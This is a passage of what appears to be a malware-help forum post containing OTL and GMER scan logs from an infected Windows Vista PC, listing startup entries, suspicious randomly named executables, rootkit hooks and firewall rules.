Technology\eDataSecurity\x86\ActiveToolBand.dll (HiTRUST) O2 - BHO: (Partner BHO Class) - {83FF80F4-8C74-4b80-B5BA-C8DDD434E5C4} - C:\ProgramData\Partner\partner.dll (Google Inc.) O2 - BHO: (Office Document Cache Handler) - {B4F3A835-0E21-4959-BA22-42B3008E02FF} - C:\Program Files\Microsoft Office\Office14\URLREDIR.DLL (Microsoft Corporation) O2 - BHO: (Bing Bar Helper) - {d2ce3e00-f94a-4740-988e-03dc2f38c34f} - C:\Program Files\Microsoft\BingBar\BingExt.dll (Microsoft Corporation.) O3 - HKLM\..\Toolbar: (no name) - {0BF43445-2F28-4351-9252-17FE6E806AA0} - No CLSID value found. O3 - HKLM\..\Toolbar: (Acer eDataSecurity Management) - {5CBE3B7C-1E47-477e-A7DD-396DB0476E29} - C:\Acer\Empowering Technology\eDataSecurity\x86\eDStoolbar.dll (Egis Incorporated.) O3 - HKLM\..\Toolbar: (Bing Bar) - {8dcb7100-df86-4384-8842-8fa844297b3f} - C:\Program Files\Microsoft\BingBar\BingExt.dll (Microsoft Corporation.) O3 - HKCU\..\Toolbar\ShellBrowser: (Acer eDataSecurity Management) - {5CBE3B7C-1E47-477E-A7DD-396DB0476E29} - C:\Acer\Empowering Technology\eDataSecurity\x86\eDStoolbar.dll (Egis Incorporated.) O4 - HKLM..\Run: [] File not found O4 - HKLM..\Run: [APSDaemon] C:\Program Files\Common Files\Apple\Apple Application Support\APSDaemon.exe (Apple Inc.) O4 - HKLM..\Run: [avgnt] C:\Program Files\Avira\AntiVir Desktop\avgnt.exe (Avira Operations GmbH & Co. KG) O4 - HKLM..\Run: [eRecoveryService] File not found O4 - HKLM..\Run: [Malwarebytes' Anti-Malware] C:\Program Files\Malwarebytes' Anti-Malware\mbamgui.exe (Malwarebytes Corporation) O4 - HKLM..\Run: [Malwarebytes' Anti-Malware (reboot)] C:\Program Files\Malwarebytes' Anti-Malware\mbam.exe (Malwarebytes Corporation) O4 - HKLM..\Run: [NetDrive] C:\Program Files\NetDrive\NetDrive.exe (Bdrive Inc.) O4 - HKLM..\Run: [SynTPStart] C:\Program Files\Synaptics\SynTP\SynTPStart.exe (Synaptics, Inc.) O4 - HKCU..\Run: [GameXN GO] C:\ProgramData\GameXN\GameXNGO.exe (EasyBits Software AS) O4 - HKCU..\Run: [Netdrive] C:\Program Files\NetDrive\netdrive.exe (Bdrive Inc.) O4 - HKCU..\Run: [pejo] C:\Users\ant\AppData\Roaming\pejo\vifier.bat () O4 - Startup: C:\Users\ant\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ownCloud.lnk = C:\Program Files\ownCloud Client\owncloud.exe () O8 - Extra context menu item: Add to Google Photos Screensa&ver - C:\Windows\System32\GPhotos.scr (Google Inc.) O8 - Extra context menu item: Google Sidewiki... - res://C:\Program Files\Google\Google Toolbar\Component\GoogleToolbarDynamic_mui_en_950DF09FAB501E03.dll/cmsidewiki.html File not found O10 - NameSpace_Catalog5\Catalog_Entries\000000000007 [] - C:\Program Files\Bonjour\mdnsNSP.dll (Apple Inc.) O13 - gopher Prefix: missing O15 - HKCU\..Trusted Domains: fritz.box ([]* in Lokales Intranet) O15 - HKCU\..Trusted Ranges: Range1 ([*] in Lokales Intranet) O16 - DPF: {34DC6011-88B5-4EA9-BA7A-DC7B4F4437FE} hxxp://photoservice.fujicolor.eu/ips-opdata/objects/jordan.cab (JordanUploader Class) O16 - DPF: {8AD9C840-044E-11D1-B3E9-00805F499D93} hxxp://java.sun.com/update/1.6.0/jinstall-1_6_0_21-windows-i586.cab (Java Plug-in 1.6.0_21) O16 - DPF: {8FFBE65D-2C9C-4669-84BD-5829DC0B603C} hxxp://fpdownload.macromedia.com/get/flashplayer/current/polarbear/ultrashim.cab (Reg Error: Key error.) O16 - DPF: {CAFEEFAC-0016-0000-0021-ABCDEFFEDCBA} hxxp://java.sun.com/update/1.6.0/jinstall-1_6_0_21-windows-i586.cab (Java Plug-in 1.6.0_21) O16 - DPF: {CAFEEFAC-FFFF-FFFF-FFFF-ABCDEFFEDCBA} hxxp://java.sun.com/update/1.6.0/jinstall-1_6_0_21-windows-i586.cab (Java Plug-in 1.6.0_21) O16 - DPF: {E2883E8F-472F-4FB0-9522-AC9BF37916A7} hxxp://platformdl.adobe.com/NOS/getPlusPlus/1.6/gp.cab (Reg Error: Key error.) O17 - HKLM\System\CCS\Services\Tcpip\Parameters: DhcpNameServer = 192.168.178.1 O17 - HKLM\System\CCS\Services\Tcpip\Parameters\Interfaces\{D6A7C132-CD4D-40B0-B557-D15BEBA0128B}: DhcpNameServer = 192.168.178.1 O18 - Protocol\Handler\livecall {828030A1-22C1-4009-854F-8E305202313F} - C:\PROGRA~1\WI1F86~1\MESSEN~1\MSGRAP~1.DLL File not found O18 - Protocol\Handler\msnim {828030A1-22C1-4009-854F-8E305202313F} - C:\PROGRA~1\WI1F86~1\MESSEN~1\MSGRAP~1.DLL File not found O18 - Protocol\Handler\skype4com {FFC8B962-9B40-4DFF-9458-1830C7DD7F5D} - C:\Program Files\Common Files\Skype\Skype4COM.dll (Skype Technologies) O20 - HKLM Winlogon: Shell - (explorer.exe) - C:\Windows\explorer.exe (Microsoft Corporation) O20 - HKLM Winlogon: UserInit - (C:\Windows\system32\userinit.exe) - C:\Windows\System32\userinit.exe (Microsoft Corporation) O24 - Desktop WallPaper: C:\Windows\Web\Wallpaper\img36.jpg O24 - Desktop BackupWallPaper: C:\Windows\Web\Wallpaper\img36.jpg O32 - HKLM CDRom: AutoRun - 1 O32 - AutoRun File - [2006.09.18 23:43:36 | 000,000,024 | ---- | M] () - C:\autoexec.bat -- [ NTFS ] O33 - MountPoints2\{06099c25-89ca-11df-b824-001d722ce5cf}\Shell - "" = AutoRun O33 - MountPoints2\{06099c25-89ca-11df-b824-001d722ce5cf}\Shell\AutoRun\command - "" = G:\USBAutoRun.exe O33 - MountPoints2\{73e0bc52-f584-11df-848e-c5c0efcc5a54}\Shell - "" = AutoRun O33 - MountPoints2\{73e0bc52-f584-11df-848e-c5c0efcc5a54}\Shell\AutoRun\command - "" = F:\Setup.exe O33 - MountPoints2\{833a5916-e89a-11de-af94-806e6f6e6963}\Shell - "" = AutoRun O33 - MountPoints2\{833a5916-e89a-11de-af94-806e6f6e6963}\Shell\AutoRun\command - "" = F:\LaunchU3.exe -a O33 - MountPoints2\{9dbcd877-aaa6-11df-aff4-806e6f6e6963}\Shell\AutoRun\command - "" = F:\Menu.exe O33 - MountPoints2\{d55ec516-5ea0-11df-a24c-806e6f6e6963}\Shell\AutoRun\command - "" = F:\Menu.exe O33 - MountPoints2\F\Shell\AutoRun\command - "" = F:\Menu.exe O34 - HKLM BootExecute: (autocheck autochk *) O35 - HKLM\..comfile [open] -- "%1" %* O35 - HKLM\..exefile [open] -- "%1" %* O37 - HKLM\...com [@ = comfile] -- "%1" %* O37 - HKLM\...exe [@ = exefile] -- "%1" %* O38 - SubSystems\\Windows: (ServerDll=winsrv:UserServerDllInitialization,3) O38 - SubSystems\\Windows: (ServerDll=winsrv:ConServerDllInitialization,2) ========== Files/Folders - Created Within 30 Days ========== [2013.06.02 17:02:09 | 000,602,112 | ---- | C] (OldTimer Tools) -- C:\Users\ant\Desktop\OTL.exe [2013.06.02 17:01:27 | 000,000,000 | ---D | C] -- C:\Users\ant\Desktop\virus tools [2013.06.02 14:56:33 | 000,000,000 | ---D | C] -- C:\Users\ant\Desktop\logs [2013.05.20 14:57:29 | 000,000,000 | ---D | C] -- C:\Users\ant\Desktop\Handy Backup [2013.05.19 21:22:16 | 000,000,000 | ---D | C] -- C:\Users\ant\AppData\Roaming\pejo [2013.05.15 20:53:08 | 000,000,000 | ---D | C] -- C:\Users\ant\AppData\Roaming\MyPhoneExplorer [2013.05.15 20:53:04 | 000,000,000 | ---D | C] -- C:\ProgramData\Microsoft\Windows\Start Menu\Programs\PriceGong [2013.05.15 20:53:03 | 000,000,000 | ---D | C] -- C:\Program Files\PriceGong [2013.05.15 20:53:03 | 000,000,000 | ---D | C] -- C:\ProgramData\Microsoft\Windows\Start Menu\Programs\MyPhoneExplorer [2013.05.15 20:52:14 | 000,000,000 | ---D | C] -- C:\Program Files\MyPhoneExplorer [1 C:\Windows\*.tmp files -> C:\Windows\*.tmp -> ] ========== Files - Modified Within 30 Days ========== [2013.06.02 17:11:17 | 000,001,094 | ---- | M] () -- C:\Windows\tasks\GoogleUpdateTaskMachineCore.job [2013.06.02 17:11:09 | 000,003,616 | -H-- | M] () -- C:\Windows\System32\7B296FB0-376B-497e-B012-9C450E1B7327-2P-1.C7483456-A289-439d-8115-601632D005A0 [2013.06.02 17:11:09 | 000,003,616 | -H-- | M] () -- C:\Windows\System32\7B296FB0-376B-497e-B012-9C450E1B7327-2P-0.C7483456-A289-439d-8115-601632D005A0 [2013.06.02 17:10:55 | 000,067,584 | --S- | M] () -- C:\Windows\bootstat.dat [2013.06.02 17:10:49 | 3219,243,008 | -HS- | M] () -- C:\hiberfil.sys [2013.06.02 17:09:39 | 000,000,020 | ---- | M] () -- C:\Users\ant\defogger_reenable [2013.06.02 17:07:05 | 000,050,477 | ---- | M] () -- C:\Users\ant\Desktop\Defogger.exe [2013.06.02 17:06:01 | 000,001,098 | ---- | M] () -- C:\Windows\tasks\GoogleUpdateTaskMachineUA.job [2013.06.02 17:02:10 | 000,602,112 | ---- | M] (OldTimer Tools) -- C:\Users\ant\Desktop\OTL.exe [2013.06.02 16:58:00 | 000,000,884 | ---- | M] () -- C:\Windows\tasks\Adobe Flash Player Updater.job [2013.06.02 16:49:01 | 000,628,992 | ---- | M] () -- C:\Windows\System32\perfh007.dat [2013.06.02 16:49:01 | 000,596,246 | ---- | M] () -- C:\Windows\System32\perfh009.dat [2013.06.02 16:49:01 | 000,126,704 | ---- | M] () -- C:\Windows\System32\perfc007.dat [2013.06.02 16:49:01 | 000,104,320 | ---- | M] () -- C:\Windows\System32\perfc009.dat [2013.05.19 21:30:31 | 000,600,389 | ---- | M] () -- C:\Users\ant\5rfakc72togyi.exe [2013.05.19 21:29:30 | 000,600,389 | ---- | M] () -- C:\Users\ant\5pyizgdrc5biy.exe [2013.05.19 21:29:11 | 000,600,389 | ---- | M] () -- C:\Users\ant\q8x93h4akie10.exe [2013.05.19 21:22:15 | 000,600,389 | ---- | M] () -- C:\Users\ant\9gghzlvklvp08.exe [2013.05.19 09:30:23 | 000,001,851 | ---- | M] () -- C:\Users\Public\Desktop\Adobe Reader 9.lnk [2013.05.18 22:43:51 | 000,411,192 | ---- | M] () -- C:\Windows\System32\FNTCACHE.DAT [2013.05.15 20:53:04 | 000,001,818 | ---- | M] () -- C:\Users\Public\Desktop\MyPhoneExplorer.lnk [1 C:\Windows\*.tmp files -> C:\Windows\*.tmp -> ] ========== Files Created - No Company Name ========== [2013.06.02 17:09:24 | 000,000,020 | ---- | C] () -- C:\Users\ant\defogger_reenable [2013.06.02 17:01:36 | 000,050,477 | ---- | C] () -- C:\Users\ant\Desktop\Defogger.exe [2013.05.19 21:30:31 | 000,600,389 | ---- | C] () -- C:\Users\ant\5rfakc72togyi.exe [2013.05.19 21:29:30 | 000,600,389 | ---- | C] () -- C:\Users\ant\5pyizgdrc5biy.exe [2013.05.19 21:29:11 | 000,600,389 | ---- | C] () -- C:\Users\ant\q8x93h4akie10.exe [2013.05.19 21:22:15 | 000,600,389 | ---- | C] () -- C:\Users\ant\9gghzlvklvp08.exe [2013.05.15 20:53:04 | 000,001,818 | ---- | C] () -- C:\Users\Public\Desktop\MyPhoneExplorer.lnk [2011.11.26 23:51:28 | 000,175,616 | ---- | C] () -- C:\Windows\System32\unrar.dll [2011.11.26 23:51:26 | 000,650,752 | ---- | C] () -- C:\Windows\System32\xvidcore.dll [2011.11.26 23:51:26 | 000,243,200 | ---- | C] () -- C:\Windows\System32\xvidvfw.dll [2011.11.26 23:51:25 | 000,074,752 | ---- | C] () -- C:\Windows\System32\ff_vfw.dll [2011.06.15 18:08:12 | 000,001,024 | ---- | C] () -- C:\Users\ant\.rnd [2011.06.06 20:26:34 | 000,000,000 | ---- | C] () -- C:\Users\ant\AppData\Local\{5336EE4C-60E1-417C-926F-ED072C3704C0} [2010.11.21 17:44:27 | 000,000,173 | -HS- | C] () -- C:\ProgramData\.zreglib [2010.06.28 14:39:01 | 000,000,680 | ---- | C] () -- C:\Users\ant\AppData\Local\d3d9caps.dat [2010.03.14 20:06:58 | 000,000,056 | -H-- | C] () -- C:\ProgramData\ezsidmv.dat [2009.05.18 23:08:39 | 000,249,344 | ---- | C] () -- C:\Users\ant\AppData\Local\DCBC2A71-70D8-4DAN-EHR8-E0D61DEA3FDF.ini ========== ZeroAccess Check ========== [2006.11.02 14:54:22 | 000,000,227 | RHS- | M] () -- C:\Windows\assembly\Desktop.ini [HKEY_CURRENT_USER\Software\Classes\clsid\{42aedc87-2188-41fd-b9a3-0c966feabec1}\InProcServer32] [HKEY_CURRENT_USER\Software\Classes\clsid\{fbeb8a05-beee-4442-804e-409d6c4515e9}\InProcServer32] [HKEY_LOCAL_MACHINE\Software\Classes\clsid\{42aedc87-2188-41fd-b9a3-0c966feabec1}\InProcServer32] "" = %SystemRoot%\system32\shell32.dll -- [2012.06.08 19:47:00 | 011,586,048 | ---- | M] (Microsoft Corporation) "ThreadingModel" = Apartment [HKEY_LOCAL_MACHINE\Software\Classes\clsid\{5839FCA9-774D-42A1-ACDA-D6A79037F57F}\InProcServer32] "" = %systemroot%\system32\wbem\fastprox.dll -- [2009.04.11 08:28:19 | 000,614,912 | ---- | M] (Microsoft Corporation) "ThreadingModel" = Free [HKEY_LOCAL_MACHINE\Software\Classes\clsid\{F3130CDB-AA52-4C3A-AB32-85FFC23AF9C1}\InProcServer32] "" = %systemroot%\system32\wbem\wbemess.dll -- [2009.04.11 08:28:25 | 000,347,648 | ---- | M] (Microsoft Corporation) "ThreadingModel" = Both ========== LOP Check ========== [2012.09.04 20:37:49 | 000,000,000 | ---D | M] -- C:\Users\ant\AppData\Roaming\Cornelsen [2010.11.21 17:37:15 | 000,000,000 | ---D | M] -- C:\Users\ant\AppData\Roaming\DAEMON Tools Lite [2009.11.09 14:21:11 | 000,000,000 | ---D | M] -- C:\Users\ant\AppData\Roaming\ESET [2009.05.19 21:40:19 | 000,000,000 | ---D | M] -- C:\Users\ant\AppData\Roaming\fotobuch.de AG [2009.11.09 14:20:41 | 000,000,000 | ---D | M] -- C:\Users\ant\AppData\Roaming\FRITZ! [2013.06.02 16:02:11 | 000,000,000 | ---D | M] -- C:\Users\ant\AppData\Roaming\go [2013.05.15 20:53:08 | 000,000,000 | ---D | M] -- C:\Users\ant\AppData\Roaming\MyPhoneExplorer [2012.09.28 23:31:15 | 000,000,000 | ---D | M] -- C:\Users\ant\AppData\Roaming\NetDrive [2009.05.18 23:02:36 | 000,000,000 | ---D | M] -- C:\Users\ant\AppData\Roaming\OpenOffice.org [2013.06.02 14:56:57 | 000,000,000 | ---D | M] -- C:\Users\ant\AppData\Roaming\pejo [2009.08.24 23:59:34 | 000,000,000 | ---D | M] -- C:\Users\ant\AppData\Roaming\schroedelarbeitblaetter [2010.11.21 17:44:36 | 000,000,000 | ---D | M] -- C:\Users\ant\AppData\Roaming\SlySoft [2009.11.09 13:44:20 | 000,000,000 | ---D | M] -- C:\Users\ant\AppData\Roaming\Thunderbird [2011.12.09 22:04:13 | 000,000,000 | ---D | M] -- C:\Users\ant\AppData\Roaming\Trine2 [2012.12.25 23:04:09 | 000,000,000 | ---D | M] -- C:\Users\ant\AppData\Roaming\TwonkyMedia [2012.12.25 22:33:06 | 000,000,000 | ---D | M] -- C:\Users\ant\AppData\Roaming\TwonkyServer ========== Purity Check ========== < End of report > Code:
ATTFilter GMER 2.1.19163 - hxxp://www.gmer.net
Rootkit scan 2013-06-02 22:26:27
Windows 6.0.6002 Service Pack 2 \Device\Harddisk0\DR0 -> \Device\Ide\IdeDeviceP0T0L0-0 WDC_WD2500BEVS-22UST0 rev.01.01A01 232,89GB
Running: gmer_2.1.19163.exe; Driver: C:\Users\ant\AppData\Local\Temp\kxtdrpow.sys
---- System - GMER 2.1 ----
SSDT 8C930A46 ZwCreateSection
SSDT 8C930A50 ZwRequestWaitReplyPort
SSDT 8C930A4B ZwSetContextThread
SSDT 8C930A55 ZwSetSecurityObject
SSDT 8C930A5A ZwSystemDebugControl
SSDT 8C9309E7 ZwTerminateProcess
---- Kernel code sections - GMER 2.1 ----
.text ntkrnlpa.exe!KeSetEvent + 215 826E9958 4 Bytes [46, 0A, 93, 8C]
.text ntkrnlpa.exe!KeSetEvent + 539 826E9C7C 4 Bytes [50, 0A, 93, 8C]
.text ntkrnlpa.exe!KeSetEvent + 56D 826E9CB0 4 Bytes [4B, 0A, 93, 8C]
.text ntkrnlpa.exe!KeSetEvent + 5D1 826E9D14 4 Bytes [55, 0A, 93, 8C]
.text ntkrnlpa.exe!KeSetEvent + 619 826E9D5C 4 Bytes [5A, 0A, 93, 8C]
.text ...
.text C:\Windows\system32\DRIVERS\atikmdag.sys section is writeable [0x8E408000, 0x1F875A, 0xE8000020]
---- User code sections - GMER 2.1 ----
.text C:\Windows\Explorer.EXE[3140] SHELL32.dll!SHGetFolderPathAndSubDirW + 81C5 7602B37C 4 Bytes [F0, 1F, 00, 10] {POP DS; ADD [EAX], DL}
.text C:\Windows\Explorer.EXE[3140] SHELL32.dll!ShellExecuteExW + 18B7 7605DA14 4 Bytes [40, 1D, 00, 10]
---- Devices - GMER 2.1 ----
AttachedDevice \Driver\kbdclass \Device\KeyboardClass0 Wdf01000.sys
AttachedDevice \Driver\kbdclass \Device\KeyboardClass1 Wdf01000.sys
AttachedDevice \FileSystem\fastfat \Fat fltmgr.sys
---- Registry - GMER 2.1 ----
Reg HKLM\SYSTEM\CurrentControlSet\Services\sptd\Cfg\14919EA49A8F3B4AA3CF1058D9A64CEC
Reg HKLM\SYSTEM\CurrentControlSet\Services\sptd\Cfg\14919EA49A8F3B4AA3CF1058D9A64CEC@p0 C:\Program Files\DAEMON Tools Lite\
Reg HKLM\SYSTEM\CurrentControlSet\Services\sptd\Cfg\14919EA49A8F3B4AA3CF1058D9A64CEC@u0 0x00 0x00 0x00 0x00 ...
Reg HKLM\SYSTEM\CurrentControlSet\Services\sptd\Cfg\14919EA49A8F3B4AA3CF1058D9A64CEC@h0 0
Reg HKLM\SYSTEM\CurrentControlSet\Services\sptd\Cfg\14919EA49A8F3B4AA3CF1058D9A64CEC@hdf12 0xC2 0x76 0xBB 0x58 ...
Reg HKLM\SYSTEM\CurrentControlSet\Services\sptd\Cfg\14919EA49A8F3B4AA3CF1058D9A64CEC\00000001
Reg HKLM\SYSTEM\CurrentControlSet\Services\sptd\Cfg\14919EA49A8F3B4AA3CF1058D9A64CEC\00000001@a0 0x20 0x01 0x00 0x00 ...
Reg HKLM\SYSTEM\CurrentControlSet\Services\sptd\Cfg\14919EA49A8F3B4AA3CF1058D9A64CEC\00000001@hdf12 0x58 0xB3 0xDD 0x04 ...
Reg HKLM\SYSTEM\CurrentControlSet\Services\sptd\Cfg\14919EA49A8F3B4AA3CF1058D9A64CEC\00000001\gdq0
Reg HKLM\SYSTEM\CurrentControlSet\Services\sptd\Cfg\14919EA49A8F3B4AA3CF1058D9A64CEC\00000001\gdq0@hdf12 0x0A 0x52 0xF8 0x64 ...
Reg HKLM\SYSTEM\ControlSet002\Services\sptd\Cfg\14919EA49A8F3B4AA3CF1058D9A64CEC (not active ControlSet)
Reg HKLM\SYSTEM\ControlSet002\Services\sptd\Cfg\14919EA49A8F3B4AA3CF1058D9A64CEC@p0 C:\Program Files\DAEMON Tools Lite\
Reg HKLM\SYSTEM\ControlSet002\Services\sptd\Cfg\14919EA49A8F3B4AA3CF1058D9A64CEC@u0 0x00 0x00 0x00 0x00 ...
Reg HKLM\SYSTEM\ControlSet002\Services\sptd\Cfg\14919EA49A8F3B4AA3CF1058D9A64CEC@h0 0
Reg HKLM\SYSTEM\ControlSet002\Services\sptd\Cfg\14919EA49A8F3B4AA3CF1058D9A64CEC@hdf12 0xC2 0x76 0xBB 0x58 ...
Reg HKLM\SYSTEM\ControlSet002\Services\sptd\Cfg\14919EA49A8F3B4AA3CF1058D9A64CEC\00000001 (not active ControlSet)
Reg HKLM\SYSTEM\ControlSet002\Services\sptd\Cfg\14919EA49A8F3B4AA3CF1058D9A64CEC\00000001@a0 0x20 0x01 0x00 0x00 ...
Reg HKLM\SYSTEM\ControlSet002\Services\sptd\Cfg\14919EA49A8F3B4AA3CF1058D9A64CEC\00000001@hdf12 0x58 0xB3 0xDD 0x04 ...
Reg HKLM\SYSTEM\ControlSet002\Services\sptd\Cfg\14919EA49A8F3B4AA3CF1058D9A64CEC\00000001\gdq0 (not active ControlSet)
Reg HKLM\SYSTEM\ControlSet002\Services\sptd\Cfg\14919EA49A8F3B4AA3CF1058D9A64CEC\00000001\gdq0@hdf12 0x0A 0x52 0xF8 0x64 ...
---- Disk sectors - GMER 2.1 ----
Disk \Device\Harddisk0\DR0 unknown MBR code
---- EOF - GMER 2.1 ----
Code:
ATTFilter OTL Extras logfile created on: 02.06.2013 17:24:00 - Run 1
OTL by OldTimer - Version 3.2.69.0 Folder = C:\Users\ant\Desktop
Windows Vista Home Premium Edition Service Pack 2 (Version = 6.0.6002) - Type = NTWorkstation
Internet Explorer (Version = 9.0.8112.16421)
Locale: 00000407 | Country: Deutschland | Language: DEU | Date Format: dd.MM.yyyy
3,00 Gb Total Physical Memory | 1,99 Gb Available Physical Memory | 66,28% Memory free
6,19 Gb Paging File | 5,21 Gb Available in Paging File | 84,05% Paging File free
Paging file location(s): ?:\pagefile.sys [binary data]
%SystemDrive% = C: | %SystemRoot% = C:\Windows | %ProgramFiles% = C:\Program Files
Drive C: | 111,57 Gb Total Space | 15,15 Gb Free Space | 13,58% Space Free | Partition Type: NTFS
Drive D: | 111,55 Gb Total Space | 35,46 Gb Free Space | 31,79% Space Free | Partition Type: NTFS
Drive G: | 1,86 Gb Total Space | 0,02 Gb Free Space | 1,00% Space Free | Partition Type: FAT
Computer Name: ANT-PC | User Name: ant | Logged in as Administrator.
Boot Mode: Normal | Scan Mode: Current user | Quick Scan
Company Name Whitelist: On | Skip Microsoft Files: On | No Company Name Whitelist: On | File Age = 30 Days
========== Extra Registry (SafeList) ==========
========== File Associations ==========
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\<extension>]
.cpl [@ = cplfile] -- C:\Windows\System32\control.exe (Microsoft Corporation)
.hlp [@ = hlpfile] -- C:\Windows\winhlp32.exe (Microsoft Corporation)
.html [@ = ChromeHTML] -- C:\Program Files\Google\Chrome\Application\chrome.exe (Google Inc.)
[HKEY_CURRENT_USER\SOFTWARE\Classes\<extension>]
.html [@ = ChromeHTML] -- Reg Error: Key error. File not found
========== Shell Spawning ==========
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\<key>\shell\[command]\command]
batfile [open] -- "%1" %*
cmdfile [open] -- "%1" %*
comfile [open] -- "%1" %*
cplfile [cplopen] -- %SystemRoot%\System32\control.exe "%1",%* (Microsoft Corporation)
exefile [open] -- "%1" %*
helpfile [open] -- Reg Error: Key error.
hlpfile [open] -- %SystemRoot%\winhlp32.exe %1 (Microsoft Corporation)
http [open] -- "C:\Program Files\Google\Chrome\Application\chrome.exe" -- "%1" (Google Inc.)
https [open] -- "C:\Program Files\Google\Chrome\Application\chrome.exe" -- "%1" (Google Inc.)
inffile [install] -- %SystemRoot%\System32\InfDefaultInstall.exe "%1" (Microsoft Corporation)
piffile [open] -- "%1" %*
regfile [merge] -- Reg Error: Key error.
scrfile [config] -- "%1"
scrfile [install] -- rundll32.exe desk.cpl,InstallScreenSaver %l
scrfile [open] -- "%1" /S
txtfile [edit] -- Reg Error: Key error.
Unknown [openas] -- %SystemRoot%\system32\rundll32.exe %SystemRoot%\system32\shell32.dll,OpenAs_RunDLL %1
Directory [AddToPlaylistVLC] -- "C:\Program Files\VideoLAN\VLC\vlc.exe" --started-from-file --playlist-enqueue "%1" ()
Directory [CEWE FOTOSCHAU] -- "C:\Program Files\SCHLECKER\SCHLECKER Foto Digital Service\CEWE FOTOSCHAU.exe" -d "%1"
Directory [cmd] -- cmd.exe /s /k pushd "%V" (Microsoft Corporation)
Directory [find] -- %SystemRoot%\Explorer.exe (Microsoft Corporation)
Directory [PlayWithVLC] -- "C:\Program Files\VideoLAN\VLC\vlc.exe" --started-from-file --no-playlist-enqueue "%1" ()
Directory [SCHLECKER Foto Digital Service] -- "C:\Program Files\SCHLECKER\SCHLECKER Foto Digital Service\SCHLECKER Foto Digital Service.exe" "%1"
Folder [open] -- %SystemRoot%\Explorer.exe /separate,/idlist,%I,%L (Microsoft Corporation)
Folder [explore] -- %SystemRoot%\Explorer.exe /separate,/e,/idlist,%I,%L (Microsoft Corporation)
Drive [find] -- %SystemRoot%\Explorer.exe (Microsoft Corporation)
========== Security Center Settings ==========
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center]
"cval" = 1
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center\Monitoring]
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center\Monitoring\McAfeeAntiSpyware]
"DisableMonitoring" = 1
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center\Svc]
"AntiVirusOverride" = 0
"AntiSpywareOverride" = 0
"FirewallOverride" = 0
"VistaSp1" = Reg Error: Unknown registry data type -- File not found
"VistaSp2" = Reg Error: Unknown registry data type -- File not found
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center\Svc\Vol]
========== Firewall Settings ==========
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\DomainProfile]
"EnableFirewall" = 1
"DisableNotifications" = 0
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile]
"EnableFirewall" = 1
"DisableNotifications" = 0
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\PublicProfile]
"EnableFirewall" = 1
"DisableNotifications" = 0
========== Authorized Applications List ==========
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List]
"C:\Program Files\fotobuch.de AG\Designer 2.0\Designer.exe" = C:\Program Files\fotobuch.de AG\Designer 2.0\Designer.exe:*:Designer.exe
========== Vista Active Open Ports Exception List ==========
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\FirewallRules]
"{01BAB6FB-2EE8-4338-ADD0-C0CED0CDA14B}" = rport=1900 | protocol=17 | dir=out | svc=ssdpsrv | app=c:\windows\system32\svchost.exe |
"{02A763CC-D826-4FF2-A962-1E02A0F68C4A}" = lport=1900 | protocol=17 | dir=in | svc=ssdpsrv | app=%systemroot%\system32\svchost.exe |
"{04BDF624-7EAE-4065-9209-8BFA933D833B}" = lport=3702 | protocol=17 | dir=in | svc=fdrespub | app=%systemroot%\system32\svchost.exe |
"{16CE6FD6-ACC3-4E6B-B5F8-465477CF0CA9}" = lport=2869 | protocol=6 | dir=in | app=system |
"{21565775-D419-44F2-BD2F-BE2C95BB9FD3}" = rport=445 | protocol=6 | dir=out | app=system |
"{525B6120-2283-4102-8418-1676D0E8F53A}" = rport=137 | protocol=17 | dir=out | app=system |
"{5D154A06-48C6-4B76-AE70-0C242389F7A6}" = lport=1900 | protocol=17 | dir=in | svc=ssdpsrv | app=svchost.exe |
"{5D4EEFAB-5D5B-42D4-8004-EEC11C0E38E0}" = lport=427 | protocol=17 | dir=in | name=druckvorgang |
"{6092F5AB-197D-42F3-9576-7269713779C5}" = lport=137 | protocol=17 | dir=in | name=druckvorgang |
"{63F62E60-2FC5-424D-9AE1-C634204CB5DB}" = lport=rpc-epmap | protocol=6 | dir=in | svc=rpcss | name=@firewallapi.dll,-28539 |
"{71F4296E-2DB3-4D6E-8FB9-23ACF99E6072}" = rport=1900 | protocol=17 | dir=out | svc=ssdpsrv | app=%systemroot%\system32\svchost.exe |
"{7469BC45-FD5D-4F16-8201-5B67ABFA03EF}" = lport=5355 | protocol=17 | dir=in | svc=dnscache | app=%systemroot%\system32\svchost.exe |
"{7D09AC59-3128-489C-B1F0-F90CCBED92AE}" = lport=445 | protocol=6 | dir=in | app=system |
"{7E6B0420-F79A-44FF-8424-6FA970ACC849}" = lport=1900 | protocol=17 | dir=in | svc=ssdpsrv | app=c:\windows\system32\svchost.exe |
"{8F3EDFD5-44CA-4C46-80F6-42BD7EDEA80D}" = lport=3702 | protocol=17 | dir=in | svc=fdphost | app=%systemroot%\system32\svchost.exe |
"{903D317E-BC5C-42C6-A3CA-5A837F68D22B}" = rport=138 | protocol=17 | dir=out | app=system |
"{9D62E869-2D8D-4B0C-B1E6-19666E027646}" = lport=rpc | protocol=6 | dir=in | svc=spooler | app=%systemroot%\system32\spoolsv.exe |
"{B4E6989F-428F-4223-884F-1724940DA61A}" = rport=139 | protocol=6 | dir=out | app=system |
"{C5E4B5F0-2565-47F0-BA30-E5D0A2C3F945}" = rport=5355 | protocol=17 | dir=out | svc=dnscache | app=%systemroot%\system32\svchost.exe |
"{D13746C7-7958-4013-AECA-98927F72D0E3}" = lport=9100 | protocol=6 | dir=in | name=druckvorgang |
"{DDE5D42A-1EEF-4E00-92D0-47D0E51AB330}" = lport=137 | protocol=17 | dir=in | app=system |
"{E2E56FB5-755A-42A9-8A73-E880A0A13AE4}" = rport=3702 | protocol=17 | dir=out | svc=fdphost | app=%systemroot%\system32\svchost.exe |
